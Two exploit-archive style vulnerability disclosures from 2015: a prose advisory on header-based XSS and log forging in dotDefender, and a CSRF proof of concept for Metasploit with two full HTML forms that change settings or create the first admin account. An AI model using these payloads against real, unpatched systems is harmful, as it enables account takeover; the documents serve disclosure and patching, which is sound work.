Vulnerable soft: Applicure DotDefender (all versions) Vendor's site: Download dotDefender 5.00 & 5.13 Vulnerabilities: Persistent XSS,Log forging,Potential DoS When Discovered: 15 March 2015 Discovered by: AkaStep Under some circumstances this is possible attack DotDefender's admin interface and as result conduct PHISHING/Log forging/Potential Denial Of service against "Log Viewer" functionality. The main reason of vulnerability: DotDefenders Developers trusts to X-Forwarded-for HTTP Header and to it's variable (that is client side controllable) and sadly there is no any validation/sanitization of that variable and it's val. This vulnerability was successfully tested against for the following configurations:(in Lab/ Production environment) 1) Apache Traffic Server ===> Apache 2.4 2) Apache 2.4 with mod_proxy. Tested versions:(But other versions may also be affected) • dotDefender Version: 5.12-13217 • Web Server Type: Apache • Server Operating System: Linux • Web Server Version: Unknown • dotDefender Version: 5.13-13282 • Web Server Type: Apache • Server Operating System: Linux • Web Server Version: Unknown Read more: http://packetstorm.wowhacker.com/1503-exploits/DotDefender-XSS.pdf

# Exploit Title: Metasploit Project initial User Creation CSRF # Google Dork: N/A # Date: 14-2-2015 # Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh) # Vendor Homepage: http://www.metasploit.com/ # Software Link: http://www.rapid7.com/products/metasploit/editions-and-features.jsp # Version: Free/Pro < 4.11.1 (Update 2015021901) # Tested on: All OS # CVE : N/A Vulnerability: Cross Site Request Forgery - (CSRF) Info: http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) More Details: After doing some research, i have found that the anti csrf token "authenticity_token" value is not validated from the local server side which will result in a more csrf attack scenario around the whole local metasploit project. Affected URL(s)/PoC Code(s): -Change Local Metasploit Project User Settings <html> <body> <form action="https://127.0.0.1:3790/users/1" method="POST"> <input type="hidden" name="utf8" value="?" /> <input type="hidden" name="_method" value="put" /> <input type="hidden" name="authenticity_token" value="" /> <input type="hidden" name="user[fullname]" value="Attacker" /> <input type="hidden" name="user[email]" value="EMAIL" /> <input type="hidden" name="user[company]" value="COMPANY" /> <input type="hidden" name="user[time_zone]" value="Cairo" /> <input type="hidden" name="commit" value="Save Settings" /> <input type="submit" value="Submit form" /> </form> </body> </html> -Full Local Metasploit Project Account Takeover before setting up the first user settings <html> <body> <form action="https://127.0.0.1:3790/users" method="POST"> <input type="hidden" name="utf8" value="?" /> <input type="hidden" name="authenticity_token" value="" /> <input type="hidden" name="user[username]" value="Username" /> <input type="hidden" name="user[password]" value="PASSWORD" /> <input type="hidden" name="user[password_confirmation]" value="PASSWORD" /> <input type="hidden" name="user[fullname]" value="FUll_Name" /> <input type="hidden" name="user[email]" value="EMAIL" /> <input type="hidden" name="user[company]" value="COMPANY" /> <input type="hidden" name="user[time_zone]" value="Cairo" /> <input type="hidden" name="commit" value="Create Account" /> <input type="submit" value="Submit form" /> </form> </body> </html> More Details/Impact: -Change Local Metasploit Project User Settings -Full Local Metasploit Project Account Takeover before setting up the first user settings Report Timeline: [-] 14/02/2015: Reported to Rapid7 Security Team [-] 14/02/2015: Initial Reply from HD Moore acknowledging the vulnerability [-] 17/02/2015: Reply from "Eray Yilmaz" about the Operation and public disclosure rules [-] 20/02/2015: Reply from "Eray Yilmaz" about releasing a patch for the vulnerability in place, Fixed in Update 4.11.1 (Update 2015021901), https://community.rapid7.com/docs/DOC-3010 [-] 16/03/2015: Public Disclosure Thanks -- *Best Regards**,**,* *Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist & Bug Bounty Hunter. LinkedIn <https://www.linkedin.com/in/symbiansymoh>Curriculum Vitae <http://goo.gl/cNrVpL> <https://www.linkedin.com/in/symbiansymoh>Facebook <https://fb.com/symbiansymoh>Twitter <https://twitter.com/symbiansymoh> Source